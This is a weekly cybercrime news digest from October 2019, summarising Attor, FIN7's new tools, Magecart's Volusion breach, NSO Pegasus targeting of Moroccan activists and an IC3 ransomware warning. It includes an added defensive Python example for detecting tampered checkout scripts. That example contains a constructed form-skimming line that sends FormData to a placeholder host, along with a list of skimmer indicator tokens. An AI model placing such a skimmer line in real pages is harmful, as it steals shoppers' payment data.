CyberCrime - W/E - 10/11/19
Attor Platform Spies on Russian Speakers as It Hides Behind Tor (10/10/2019)
A cyber espionage platform dubbed "Attor" by ESET researchers uses two features to avoid detection and analysis: its GSM (Global System for Mobile Communications) plugin uses the AT command protocol, and it routes its network communications through Tor for its highly targeted operations. The platform has existed since at least 2013 and monitors victim activities by taking screenshots of specific applications. Attor primarily targets Russian speakers and has been seen attacking diplomats, government institutions, and individuals concerned with their privacy.
FIN7 Adds Dangerous New Tools to Threat Arsenal (10/10/2019)
FireEye identified and analyzed two new tools in use by the FIN7 threat group. BOOSTWRITE is an in-memory-only dropper that decrypts embedded payloads using an encryption key retrieved from a remote server at runtime. One variant of BOOSTWRITE contained the Carbanak and RDFSNIFFER payloads. RDFSNIFFER is the second tool and appears to have been developed to tamper with NCR's Aloha Command Center client, a remote administration toolset designed to manage and troubleshoot systems within payment card processing sectors running the Command Center Agent. RDFSNIFFER contains a backdoor component enabling an attacker to upload, download, execute and/or delete arbitrary files. FireEye notified NCR of the RDFSNIFFER tool.
Magecart Compromises Ecommerce Cloud Platform, Injects Credit Card Skimmers (10/10/2019)
A Magecart attack compromised the cloud platform of the ecommerce service provider Volusion, resulting in the breach of several online shops. According to Trend Micro, malicious code was placed in a JavaScript library that Volusion provides to its client shops. The injected code loaded a second JavaScript file stored on a Google Storage service. That loaded script is an almost direct copy of a legitimate JavaScript library with a credit card skimmer carefully integrated into it. Volusion acknowledged the compromise and deployed a fix. Trend Micro attributes this compromise to Magecart Group 6, which is also known as FIN6.
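The Volusion case turns on a served library that differs only slightly from the legitimate one. The following is an added example (not Trend Micro's, Volusion's, or the original article's code) showing two defender-side checks a shop can run against a third-party script: a Subresource Integrity (SRI) style hash comparison against a pinned known-good digest, and a line diff that surfaces what was added. The library contents, the tampered copy, and the host name `storage.example.invalid` are constructed for illustration.

```python
import base64
import difflib
import hashlib
import hmac

# Constructed sample: a tiny "vendor library" as the shop expects to receive it.
GOOD_LIB = """(function(){
  function addToCart(id){ return {id: id, qty: 1}; }
  window.shopLib = {addToCart: addToCart};
})();
"""

# Constructed sample: the same library with one extra line that posts form
# submissions to a third-party host, the shape of change a skimmer introduces.
TAMPERED_LIB = GOOD_LIB.replace(
    "  window.shopLib = {addToCart: addToCart};",
    "  window.shopLib = {addToCart: addToCart};\n"
    "  document.addEventListener('submit', function(e){"
    " fetch('https://storage.example.invalid/c', {method: 'POST',"
    " body: new FormData(e.target)}); });",
)

# Indicators a reviewer would look for in newly added lines of a checkout-page
# library; these are heuristics, not a definitive signature.
SUSPICIOUS_TOKENS = ("FormData", "fetch(", "XMLHttpRequest", "'submit'", "btoa(", "keyup")


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Return an SRI-style value ('sha384-<base64>') for a script body."""
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode()}"


def verify_script(content: bytes, expected_sri: str) -> bool:
    """Compare the served script against a pinned SRI value in constant time."""
    algo, _, _ = expected_sri.partition("-")
    return hmac.compare_digest(sri_hash(content, algo), expected_sri)


def added_lines(baseline: str, candidate: str) -> list:
    """Lines present in candidate but not in baseline, per difflib.ndiff."""
    return [
        line[2:]
        for line in difflib.ndiff(baseline.splitlines(), candidate.splitlines())
        if line.startswith("+ ")
    ]


def suspicious_additions(baseline: str, candidate: str) -> list:
    """Added lines that contain any of the indicator tokens."""
    return [
        line
        for line in added_lines(baseline, candidate)
        if any(token in line for token in SUSPICIOUS_TOKENS)
    ]


if __name__ == "__main__":
    pinned = sri_hash(GOOD_LIB.encode())
    print("pinned integrity:", pinned)
    print("good copy verifies:", verify_script(GOOD_LIB.encode(), pinned))
    print("tampered copy verifies:", verify_script(TAMPERED_LIB.encode(), pinned))
    for line in suspicious_additions(GOOD_LIB, TAMPERED_LIB):
        print("suspicious addition:", line.strip())
```

The hash check is what an `integrity` attribute on the `<script>` tag would enforce in the browser; running the same comparison in a scheduled job against the live URL catches the case where the vendor's copy changes silently. The diff step is for triage after a mismatch, so the reviewer sees the added behaviour rather than only a failed digest.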
Magecart Threat Group Tied to Cobalt Cyber Attackers (10/07/2019)
RiskIQ has warned that Magecart is becoming a serious threat: its skimmers have been observed over two million times and have breached over 18,000 hosts. Magecart's average breach length is 22 days, and 17% of malicious advertisements observed by RiskIQ were infected with Magecart skimmers. Magecart actually consists of more than one group of attackers. In a separate report, Malwarebytes and HYAS connected Magecart Group 4 with the well-known Cobalt Group by matching patterns in the email addresses used to register domains. Group 4 has also been conducting both client-side and server-side skimming, while the other Magecart groups only use client-side skimming.
Moroccan Human Rights Activists Targeted by NSO Group Spyware (10/10/2019)
Two human rights defenders in Morocco have been targeted using surveillance technology developed by the Israel-based company NSO Group, according to research published by Amnesty International. Maati Monjib, an academic and human rights activist, and Abdessadak El Bouchattaoui, a human rights lawyer who has represented protesters from the Hirak El-Rif social justice movement, received SMS messages containing malicious links that, if clicked, would secretly install Pegasus software, allowing the sender to obtain near-total control of the phone. The same technology was used to target an Amnesty staff member and a Saudi Arabian human rights activist in June 2018. NSO Group is known to sell its spyware only to government intelligence and law enforcement agencies, raising concerns that Moroccan security agencies are behind the surveillance.
US Businesses, Consumers Threatened by Targeted Ransomware Attacks (10/07/2019)
The Internet Crime Complaint Center (IC3) issued a warning regarding targeted ransomware. According to the FBI, cyber thieves are using email phishing, Remote Desktop Protocol vulnerabilities, and software vulnerabilities to target consumers and companies and to make their attacks more effective.